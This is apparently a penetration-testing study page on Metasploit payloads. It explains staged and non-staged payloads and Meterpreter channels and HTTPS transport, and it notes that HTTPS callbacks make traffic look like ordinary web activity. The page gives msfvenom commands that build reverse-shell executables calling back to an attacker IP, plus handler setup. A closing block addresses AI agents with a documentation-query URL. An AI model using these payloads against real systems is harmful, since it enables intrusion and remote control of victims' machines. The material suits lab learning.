# Payloads

## **Staged vs Non-Staged**

* **Non-Staged Payload**: Sends the full exploit and shellcode together; more stable but larger in size. E.g. `payload/linux/x64/shell_reverse_tcp`.
* **Staged Payload**: A two-step process. A small stager is first delivered, which then connects to the attacker's machine to fetch the rest of the payload. They have a `/` in the payload name, e.g. `shell/reverse_tcp`.

> ***Staged payloads** are useful when **space is limited** or for **evading detection** but creates extra network traffic. First, a small initial program (the **stager**) runs on the target machine. Its job is to reach back to your attacker machine and download the malicious part of the payload (the **stage**) over the network which is then retrieved and **injected directly into the victim machine's memory**.*

## **Meterpreter**

Meterpreter is a powerful, flexible payload that runs entirely in memory, leaving fewer traces and offering encrypted communication, file transfers, and system management tools. It enables advanced post-exploitation actions.

```bash
# Set Meterpreter payload
msf6 exploit(multi/http/apache_normalize_path_rce) > set payload 13
payload => linux/x64/meterpreter_reverse_tcp

# Run exploit
msf6 exploit(multi/http/apache_normalize_path_rce) > run

# Example Meterpreter commands
meterpreter > sysinfo
meterpreter > getuid
```

Commands with the `l` prefix operate locally, i.e., on our attacker machine.

```bash
meterpreter > help

...
Stdapi: File system Commands
============================

    Command                   Description
    -------                   -----------
...
    lls                       List local files
    ls                        List files
...
```

### Channels

Meterpreter allows the creation of multiple command shells (**channels**).

```bash
# create a new channel
meterpreter > shell
Process 135 created.
Channel 1 created.
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
^Z
Background channel 1? [y/N]  y

# create a second channel
meterpreter > shell
Process 137 created.
Channel 2 created.
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
^Z
Background channel 2? [y/N]  y

# list all active channels
meterpreter > channel -l

    Id  Class  Type
    --  -----  ----
    1   3      stdapi_process
    2   3      stdapi_process
```

### **HTTPS**

HTTPS Meterpreter payloads use encrypted web traffic for communication. When the infected target connects back to the attacker's machine, it does so over HTTPS, **making the traffic look like regular web activity**. Security tools monitoring the network only see harmless-looking encrypted requests, not the actual malicious instructions inside. If a defender inspects the callback URL directly in a browser, they’ll just see a generic `404` error, not the payload or its commands. However, Meterpreter is well-known and can be detected by antivirus systems. A common strategy is to use a simple shell to gain initial access, then deploy Meterpreter after evading detection.

```bash
# Example HTTPS Meterpreter payload
payload/linux/x64/meterpreter_reverse_https
```

## **msfvenom**

msfvenom is used to generate payloads in various formats. These payloads initiate a reverse connection to the attacker's machine, allowing remote control.

{% code overflow="wrap" %}

```bash
# List available payloads for Windows x64
$ msfvenom -l payloads --platform windows --arch x64

# Generate non-staged payload (Windows)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.242 LPORT=443 -f exe -o nonstaged.exe

# Generate staged payload (Windows)
$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.45.242 LPORT=443 -f exe -o staged.exe
```

{% endcode %}

Staged payloads need a **Metasploit handler** (`multi/handler`) since tools like `nc` cannot handle them.

> *`nc` will be to catch them, but we won't be able to send any commands through them.*

```bash
# Start multi/handler for staged payloads
msf6 exploit(multi/http/apache_normalize_path_rce) > use multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set LHOST 192.168.45.242
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > run
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://x7331.gitbook.io/boxes/tools/metasploit/payloads.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.